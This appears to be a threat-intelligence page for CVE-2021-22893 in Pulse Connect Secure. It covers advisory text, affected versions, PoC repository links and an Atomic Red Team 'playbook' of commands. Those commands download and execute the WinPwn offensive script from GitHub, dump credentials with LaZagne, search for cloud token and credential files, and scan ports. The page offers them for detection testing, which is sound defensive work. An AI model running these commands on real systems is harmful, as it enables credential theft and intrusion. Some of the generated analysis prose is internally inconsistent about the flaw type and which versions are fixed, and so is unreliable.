CVE-2021-22893
Overview
This vulnerability is an authentication bypass affecting the Pulse Connect Secure gateway, specifically triggered through the Windows File Share Browser and Pulse Secure Collaboration features. The root cause lies in improper validation of authentication tokens, allowing unauthenticated access to privileged functions. The flaw enables attackers to interact with internal components without valid credentials, exploiting memory management weaknesses related to use-after-free conditions.
Vulnerability Description
Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild.
Impact
An unauthenticated attacker can remotely execute arbitrary code on the Pulse Connect Secure gateway, gaining full control over the device. This enables access to sensitive network resources behind the gateway, potential data exfiltration, and lateral movement within the network. No prior authentication or user interaction is required, making exploitation straightforward and highly impactful for organizations relying on Pulse Connect Secure for remote access security.
Solution
Ivanti has released security updates addressing this vulnerability in Pulse Connect Secure versions 9.0R3 and 9.1R1 and later. Administrators should apply the patches detailed in Ivanti Security Advisory SA44784, available at https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/. The advisory provides version-specific fixes and recommended upgrade paths to mitigate the issue. Immediate patching is advised to prevent exploitation.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The authentication bypass vulnerability in Pulse Connect Secure versions 9.0R3 and 9.1R1 and later is a critical security flaw that allows unauthenticated users to execute arbitrary code remotely on the gateway. This vulnerability is primarily exposed through the Windows File Share Browser and the Pulse Secure Collaboration features. The flaw arises from improper validation of user authentication, enabling attackers to gain unauthorized access to sensitive functionalities without needing valid credentials. This can lead to severe consequences, including the installation of malware, data exfiltration, and further network compromise.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. An adversary could leverage the compromised features to bypass authentication mechanisms, gaining direct access to the underlying system. Once inside, the attacker can execute arbitrary commands, potentially leading to full system control. Exploitation can occur remotely, making it accessible to attackers without physical proximity to the target system. Such capabilities are attractive to malicious actors, particularly in environments where Pulse Connect Secure is used to facilitate remote work and secure access to corporate resources.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on Pulse Connect Secure for secure remote access. The potential for remote code execution poses a high business risk, as it can lead to data breaches, loss of sensitive information, and disruption of services. Organizations may face reputational damage, regulatory penalties, and financial losses as a result of successful exploitation. Furthermore, the fact that this vulnerability has been actively exploited in the wild amplifies the urgency for organizations to address it promptly. The implications extend beyond immediate financial concerns, as the trust of clients and partners may be jeopardized.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating and patching affected systems is paramount, as vendors typically release security updates to address known vulnerabilities. Additionally, organizations should conduct thorough security assessments and penetration testing to identify potential weaknesses in their configurations and practices. Monitoring network traffic for unusual patterns or unauthorized access attempts can also aid in early detection of exploitation attempts. Furthermore, employing robust access controls and user authentication mechanisms can help mitigate the risk of unauthorized access.
In conclusion, the authentication bypass vulnerability in Pulse Connect Secure represents a critical threat that organizations must take seriously. The potential for remote code execution by unauthenticated users poses severe risks to data integrity and system availability. By understanding the technical details, attack vectors, and real-world implications, organizations can better prepare themselves to defend against such vulnerabilities. Proactive detection and mitigation strategies, combined with a commitment to maintaining up-to-date security practices, are essential to safeguarding against the exploitation of this and similar vulnerabilities in the future.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2021-22893, evidenced by new telemetry indicating renewed attacker interest despite a declining EPSS score. This divergence suggests that while the overall likelihood of exploitation in the wild may be perceived as decreasing, adversaries—particularly ransomware-affiliated groups—are intensifying focused campaigns leveraging this vulnerability. The emergence of additional proof-of-concept exploits on public repositories further lowers the barrier for threat actors to weaponize this flaw, amplifying the risk of successful remote code execution attacks against unpatched Pulse Connect Secure gateways. Consequently, the threat landscape remains highly dynamic, underscoring the criticality of continuous monitoring. The updated intelligence signals an elevated operational threat level for defenders, as exploitation attempts are becoming more frequent and sophisticated, increasing the potential for impactful ransomware campaigns exploiting this vulnerability.
Affected Products (36)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r2.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.5:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r4:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r4.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r5.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r6.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:-:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r10.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r10.2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r11.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r11.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r11.3:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ZephrFish/CVE-2021-22893_HoneyPoC2
DO NOT RUN THIS.
|
ZephrFish | 47 | 19 | 2021-04-21 | View |
|
orangmuda/CVE-2021-22893
Proof On Concept — Pulse Secure CVE-2021-22893
|
orangmuda | 7 | 5 | 2021-10-03 | View |
|
MRLEE123456/CVE-2021-22893
Pulse Connect Secure RCE Vulnerability (CVE-2021-22893)
|
MRLEE123456 | 0 | 3 | 2021-04-21 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-22893 |
| kb.pulsesecure.net |
GitHub CVE
x_refsource_MISC
|
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/ |
| blog.pulsesecure.net |
GitHub CVE
x_refsource_MISC
|
https://blog.pulsesecure.net/pulse-connect-secure-security-update/ |
| fireeye.com |
GitHub CVE
x_refsource_MISC
|
https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html |
| kb.cert.org |
GitHub CVE
x_refsource_MISC
|
https://kb.cert.org/vuls/id/213092 |
| kb.cert.org |
NVD API
US Government Resource
|
https://www.kb.cert.org/vuls/id/213092 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-22893 |